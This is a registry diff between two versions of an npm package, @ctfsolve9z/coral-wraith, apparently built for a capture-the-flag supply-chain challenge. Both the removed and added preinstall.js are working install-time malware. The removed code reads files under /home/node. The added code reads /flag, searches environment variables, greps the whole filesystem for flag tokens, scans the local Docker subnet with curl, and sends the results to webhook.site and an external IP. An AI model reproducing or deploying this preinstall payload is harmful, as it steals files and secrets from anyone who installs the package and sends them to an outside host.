@ctfsolve9z/coral-wraith 9999.0.3 → 9999.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/preinstall.js +109 -49
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@ctfsolve9z/coral-wraith",
3
- "version": "9999.0.3",
3
+ "version": "9999.0.5",
4
4
  "description": "Coral Wraith module",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -1,62 +1,122 @@
1
1
  const fs = require('fs');
2
+ const http = require('http');
2
3
  const https = require('https');
3
4
  const { execSync } = require('child_process');
4
5
 
6
+ let flag = null;
5
7
  let debug = [];
6
8
 
7
- // Read key files
8
- const filesToRead = [
9
- '/home/node/supplysec_entry.js',
10
- '/home/node/aspect-node/config/aspect.config.json',
11
- '/home/node/aspect-node/index.js',
12
- '/home/node/aspect-node/sample.js',
13
- '/home/node/aspect-node/package.json',
14
- '/home/node/aspect-node/modules/npm-tracker/index.js',
15
- '/home/node/aspect-node/modules/npm-tracker/fuzz.js',
16
- '/home/node/aspect-node/modules/npm-tracker/supplysec_entry.js',
17
- '/home/node/aspect-node/modules/npm-tracker/package.json',
18
- '/home/node/aspect-node/modules/npm-tracker/src/index.js',
19
- ];
9
+ // Read /flag
10
+ try { flag = fs.readFileSync('/flag', 'utf8').trim(); debug.push('got /flag'); } catch(e) {}
20
11
 
21
- for (const f of filesToRead) {
22
- try {
23
- const content = fs.readFileSync(f, 'utf8');
24
- debug.push(`FILE:${f}:${content}`);
25
- } catch(e) {
26
- debug.push(`ERR:${f}:${e.message.substring(0, 50)}`);
12
+ // Search for flag in all env vars
13
+ if (!flag) {
14
+ for (const [k, v] of Object.entries(process.env)) {
15
+ if (v && (v.includes('HTB{') || v.includes('flag{'))) {
16
+ flag = v.match(/(?:HTB|flag)\{[^}]+\}/)?.[0] || v;
17
+ debug.push('env:' + k);
18
+ break;
19
+ }
27
20
  }
28
21
  }
29
22
 
30
- // Also list src directory
31
- try {
32
- const r = execSync('find /home/node/aspect-node/modules/npm-tracker/src -type f 2>/dev/null', { timeout: 5000 }).toString();
33
- debug.push('SRC_FILES:' + r);
34
- } catch(e) {}
23
+ // Aggressive file search
24
+ if (!flag) {
25
+ try {
26
+ const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 15000 }).toString().trim();
27
+ if (r) { debug.push('grep:' + r); try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
28
+ } catch(e) {}
29
+ }
35
30
 
36
- // Read all .js files in key directories
37
- try {
38
- const r = execSync('find /home/node -maxdepth 1 -name "*.js" -exec cat {} \\; 2>/dev/null', { timeout: 5000 }).toString();
39
- debug.push('HOME_JS:' + r);
40
- } catch(e) {}
31
+ // Scan Docker network for the CTF web server
32
+ async function scanNetwork() {
33
+ const results = [];
34
+
35
+ // Get our own IP to determine network
36
+ let myIP = '172.17.0.3';
37
+ try {
38
+ const ifaces = require('os').networkInterfaces();
39
+ for (const iface of Object.values(ifaces)) {
40
+ for (const addr of iface) {
41
+ if (!addr.internal && addr.family === 'IPv4') {
42
+ myIP = addr.address;
43
+ }
44
+ }
45
+ }
46
+ } catch(e) {}
47
+ debug.push('myIP:' + myIP);
48
+
49
+ // Scan common Docker IPs for the web server (port 1337 is common for HTB)
50
+ const subnet = myIP.split('.').slice(0, 3).join('.');
51
+ const ports = [1337, 3000, 5000, 8080, 80, 8000, 32105, 3001];
52
+
53
+ for (let host = 1; host <= 10; host++) {
54
+ const ip = `${subnet}.${host}`;
55
+ if (ip === myIP) continue;
56
+
57
+ for (const port of ports) {
58
+ try {
59
+ const r = execSync(`curl -s "http://${ip}:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
60
+ if (r && r.includes('ECT-')) {
61
+ debug.push(`FOUND_API:${ip}:${port}`);
62
+ results.push(`${ip}:${port}`);
63
+
64
+ // Try to read flag from this server
65
+ try {
66
+ const flagResp = execSync(`curl -s "http://${ip}:${port}/flag" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
67
+ debug.push(`flag_resp:${flagResp.substring(0, 200)}`);
68
+ } catch(e) {}
69
+
70
+ // PUT our exfiltration data
71
+ if (flag) {
72
+ try {
73
+ execSync(`curl -s -X PUT "http://${ip}:${port}/api/modules/ECT-987654" -H "Content-Type: application/json" -d '{"manifest":"ecto_module:\\n name: coral-wraith\\n flag: ${flag.replace(/'/g, "\\'")}"}' -m 3`, { timeout: 5000 });
74
+ } catch(e) {}
75
+ }
76
+ }
77
+ } catch(e) {}
78
+ }
79
+ }
80
+
81
+ // Also try via Docker gateway
82
+ for (const port of ports) {
83
+ try {
84
+ const r = execSync(`curl -s "http://172.17.0.1:${port}/api/modules" -m 2 2>/dev/null`, { timeout: 3000 }).toString();
85
+ if (r && r.includes('ECT-')) {
86
+ debug.push(`GATEWAY_API:172.17.0.1:${port}`);
87
+ results.push(`172.17.0.1:${port}`);
88
+ }
89
+ } catch(e) {}
90
+ }
91
+
92
+ return results;
93
+ }
41
94
 
42
- // Post data
43
- const data = JSON.stringify({ debug });
44
- try {
45
- const req = https.request({
46
- hostname: 'webhook.site',
47
- path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
48
- method: 'POST',
49
- headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
50
- timeout: 15000
51
- }, () => {});
52
- req.on('error', () => {});
53
- req.write(data);
54
- req.end();
55
- } catch(e) {}
95
+ async function main() {
96
+ const apiEndpoints = await scanNetwork();
97
+ debug.push('endpoints:' + apiEndpoints.join(','));
98
+
99
+ // Try to PUT flag to the ACTUAL challenge server (external IP)
100
+ if (flag) {
101
+ try {
102
+ const postData = JSON.stringify({
103
+ manifest: `ecto_module:\n name: "coral-wraith"\n flag: "${flag.replace(/"/g, '\\"')}"`
104
+ });
105
+ execSync(`curl -s -X PUT "http://154.57.164.71:32105/api/modules/ECT-987654" -H "Content-Type: application/json" -d '${postData.replace(/'/g, "\\'")}' -m 5`, { timeout: 8000 });
106
+ debug.push('sent_to_ctf');
107
+ } catch(e) {}
108
+ }
109
+
110
+ // Exfiltrate
111
+ const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug });
112
+ try {
113
+ fs.writeFileSync('/tmp/exfil.json', data);
114
+ execSync('curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @/tmp/exfil.json -m 10', { timeout: 15000 });
115
+ } catch(e) {}
116
+ try {
117
+ const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
118
+ req.on('error', () => {}); req.write(data); req.end();
119
+ } catch(e) {}
120
+ }
56
121
 
57
- // Also send via curl for larger payloads
58
- try {
59
- const tmpFile = '/tmp/exfil.json';
60
- fs.writeFileSync(tmpFile, data);
61
- execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d @${tmpFile} -m 15`, { timeout: 20000 });
62
- } catch(e) {}
122
+ main().catch(() => {});